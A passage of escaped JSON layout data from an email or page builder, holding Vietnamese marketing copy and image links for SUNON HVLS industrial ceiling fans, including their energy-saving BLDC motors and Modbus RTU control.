h\\u01a1n.<\\/p>\\\"}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_23\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_11\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"RYZiqC9Ge_\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"_8LBi9___H\\\",\\\"contents\\\":[{\\\"id\\\":\\\"ABnyA8di4x\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_13\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"_s7AkbMQ6N\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"9px 33px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"color\\\":\\\"#444444\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"150%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_3\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 150%;\\\\\\\"><strong>Qu\\u1ea1t tr\\u1ea7n ch\\u1ea5t l\\u01b0\\u1ee3ng cao TAIWAN<\\/strong><br \\/>Qu\\u1ea1t tr\\u1ea7n c\\u00f4ng nghi\\u1ec7p l\\u1edbn ti\\u1ebft ki\\u1ec7m n\\u0103ng l\\u01b0\\u1ee3ng m\\u1ea1nh m\\u1ebd, th\\u1ed5i m\\u1ea1nh m\\u1ebd, ph\\u00f9 h\\u1ee3p \\u0111\\u1ec3 t\\u1ea3n nhi\\u1ec7t \\u0111\\u1ed1i l\\u01b0u trong kh\\u00f4ng gian r\\u1ed9ng, gi\\u00fap gi\\u1ea3m nhi\\u1ec7t \\u0111\\u1ed9 r\\u00f5 r\\u00e0ng m\\u1ed9t c\\u00e1ch hi\\u1ec7u qu\\u1ea3 v\\u00e0 t\\u1ea3n nhi\\u1ec7t \\u0111\\u1ec1u. V\\u1edbi vi\\u1ec7c s\\u1eed d\\u1ee5ng \\u0111\\u1ed9ng c\\u01a1 truy\\u1ec1n \\u0111\\u1ed9ng tr\\u1ef1c ti\\u1ebfp BLDC hi\\u1ec7u su\\u1ea5t cao, d\\u00f2ng qu\\u1ea1t c\\u00f4ng nghi\\u1ec7p m\\u1ea1nh m\\u1ebd c\\u1ee7a ch\\u00fang t\\u00f4i c\\u00f3 th\\u1ec3 ti\\u1ebft ki\\u1ec7m n\\u0103ng l\\u01b0\\u1ee3ng \\u0111\\u00e1ng k\\u1ec3 do s\\u1eed \\u0111\\u1ed9ng c\\u01a1 t\\u1eeb nam ch\\u00e2m do ch\\u00ednh SUNON thi\\u1ebft k\\u1ebf c\\u00f3 h\\u01a1n 40 n\\u0103m kinh nghi\\u1ec7m s\\u1ea3n xu\\u1ea5t v\\u00e0 nghi\\u00ean c\\u1ee9u. B\\u00ean c\\u1ea1nh \\u0111\\u00f3, d\\u00f2ng \\u0111\\u1ed9ng c\\u01a1 n\\u00e0y duy tr\\u00ec \\u0111\\u1ed9 b\\u1ec1n t\\u1ed1t m\\u00e0 kh\\u00f4ng c\\u1ea7n thay d\\u1ea7u th\\u01b0\\u1eddng xuy\\u00ean, cho ph\\u00e9p n\\u00f3 tr\\u1edf th\\u00e0nh s\\u1ef1 l\\u1ef1a ch\\u1ecdn hi\\u1ec7u qu\\u1ea3 nh\\u1ea5t v\\u1ec1 chi ph\\u00ed \\u0111\\u1ec3 \\u0111\\u1ea7u t\\u01b0 l\\u00e2u d\\u00e0i v\\u00e0o h\\u1ec7 th\\u1ed1ng \\u0111i\\u1ec1u h\\u00f2a kh\\u00f4ng kh\\u00ed th\\u01b0\\u01a1ng m\\u1ea1i.<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"mSnaLE2cv7\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681372080311-Powerful1-07.jpg\\\",\\\"width\\\":1201,\\\"height\\\":1071},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_28\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"fhAyvauViK\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#d8d0d0\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"18px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_3\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"3vM6it4cB4\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 33px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"color\\\":\\\"#444444\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"150%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 150%;\\\\\\\"><strong>T\\u1ed0I \\u01afU H\\u00d3A KH\\u00cd H\\u1eacU<\\/strong><br \\/>Kh\\u00e1c v\\u1edbi h\\u1ea7u h\\u1ebft c\\u00e1c qu\\u1ea1t tr\\u1ea7n c\\u00f4ng nghi\\u1ec7p l\\u1edbn tr\\u00ean th\\u1ecb tr\\u01b0\\u1eddng d\\u1ef1a v\\u00e0o t\\u1ed1c \\u0111\\u1ed9 quay nhanh \\u0111\\u1ec3 t\\u1ea1o ra lu\\u1ed3ng kh\\u00f4ng kh\\u00ed kh\\u00f4ng \\u1ed5n \\u0111\\u1ecbnh v\\u00e0 kh\\u00f4ng \\u0111\\u1ed3ng \\u0111\\u1ec1u, Qu\\u1ea1t tr\\u1ea7n c\\u00f4ng nghi\\u1ec7p l\\u1edbn HVLS Fan series 1s\\u1eed d\\u1ee5ng kh\\u1ea3 n\\u0103ng \\u0111i\\u1ec1u khi\\u1ec3n \\u0111\\u1ed9ng c\\u01a1 v\\u01b0\\u1ee3t tr\\u1ed9i \\u0111\\u1ec3 t\\u1ea1o ra gi\\u00f3 \\u0111\\u1ec1u v\\u00e0 nh\\u1eb9.<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"3XywiR4X-b\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680167720431-Powerful3-12.jpeg\\\",\\\"width\\\":1201,\\\"height\\\":426,\\\"autoWidth\\\":true,\\\"maxWidth\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_6\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_5\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"#ecf0f1\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_4\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"TYDvAo7QXc\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"KkKlsm36KR\\\",\\\"contents\\\":[{\\\"id\\\":\\\"UK_eLCqkQz\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#d8d0d0\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"18px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_5\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"_K40u5XnIY\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"1px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_7\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><strong>\\u0110I\\u1ec0U KHI\\u1ec2N TH\\u00d4NG MINH<\\/strong><\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">Ki\\u1ec3m so\\u00e1t t\\u1ed1t h\\u01a1n c\\u00e1c t\\u00ednh n\\u0103ng \\u0111i\\u1ec1u khi\\u1ec3n c\\u1ee7a qu\\u1ea1t SUNON. N\\u1ebfu b\\u1ea1n c\\u1ea7n m\\u1ee9c \\u0111\\u1ed9 qu\\u1ea3n l\\u00fd t\\u1eadp trung th\\u00f4ng qua Modbus - nh\\u01b0 l\\u00e0 m\\u1ed9t ph\\u01b0\\u01a1ng th\\u1ee9c qu\\u1ea3n l\\u00fd t\\u1eadp trung khi c\\u00f3 qu\\u00e1 nhi\\u1ec1u qu\\u1ea1t c\\u1ea7n qu\\u1ea3n l\\u00fd d\\u1ec5 d\\u00e0ng v\\u00e0 thu\\u1eadn ti\\u1ec7n. H\\u00e3y li\\u00ean h\\u1ec7 v\\u1edbi ch\\u00fang t\\u00f4i !<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">SUNON HVLS cung c\\u1ea5p gi\\u1ea3i ph\\u00e1p qu\\u1ea3n l\\u00fd Modbus th\\u00f4ng qua giao th\\u1ee9c chu\\u1ea9n c\\u00f4ng nghi\\u1ec7p RTU<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">Modbus RTU - \\u0111\\u00e2y l\\u00e0 m\\u1ed9t giao th\\u1ee9c \\u0111\\u01b0\\u1ee3c s\\u1eed d\\u1ee5ng r\\u1ed9ng r\\u00e3i trong nhi\\u1ec1u l\\u0129nh v\\u1ef1c nh\\u01b0 BMS (Building Management Systems), t\\u1ef1 \\u0111\\u1ed9ng h\\u00f3a, c\\u00f4ng nghi\\u1ec7p<\\/p>\\\"}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_3\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"#ecf0f1\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_3\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"lz-ixEIpPZ\\\",\\\"cells\\\":[1,1,1],\\\"columns\\\":[{\\\"id\\\":\\\"MJlj9zB0N8\\\",\\\"contents\\\":[{\\\"id\\\":\\\"XiwlcZ22cN\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680169223539-remote-control.jpg\\\",\\\"width\\\":360,\\\"height\\\":360},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_8\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_7\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"njYx9-f90X\\\",\\\"contents\\\":[{\\\"id\\\":\\\"VTctBDZ18r\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_17\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_8\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"y9235nL0ac\\\",\\\"contents\\\":[{\\\"id\\\":\\\"z59_MxupRK\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680169233314-bien-tan.jpg\\\",\\\"width\\\":360,\\\"height\\\":360},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_10\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_9\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_6\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"YbLHtpjkh0\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"jW9WWipw8d\\\",\\\"contents\\\":[{\\\"id\\\":\\\"jYPxTblxnF\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#95a5a6\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"18px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_1\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"a93qCztjWG\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"2px 10px 6px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_12\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><strong>V\\u1ecb tr\\u00ed &amp; Kho\\u1ea3ng tr\\u1ed1ng gi\\u1eefa Qu\\u1ea1t v\\u00e0 V\\u1eadt c\\u1ea3n<\\/strong><\\/p>\\\"}},{\\\"id\\\":\\\"VG2Wtw2ZlC\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681372344847-6%2018.jpg\\\",\\\"width\\\":1201,\\\"height\\\":491},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_29\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"5XMfCB2N_C\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/ceilingfan.vn\\/en\\/sunon-powerful-series-1\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#4fbbd8\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"15px 44px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"40px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_1\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 16.8px;\\\\\\\">XEM TH\\u00caM - V\\u1ec0 SUNON<\\/span><\\/strong><\\/span>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":246,\\\"calculatedHeight\\\":47}},{\\\"id\\\":\\\"HG30UIk3ly\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"4px 33px 7px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Source Sans Pro\\\",\\\"value\\\":\\\"\'Source Sans Pro\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Source+Sans+Pro:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"22px\\\",\\\"color\\\":\\\"#236fa1\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_2\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 30.8px; font-family: \'Source Sans Pro\', sans-serif;\\\\\\\">Kh\\u00f4ng Ch\\u1ec9 L\\u00e0 M\\u00e1t - M\\u00e0 C\\u00f2n H\\u01a1n Th\\u1ebf N\\u1eefa<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_2\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"#ecf0f1\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_2\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\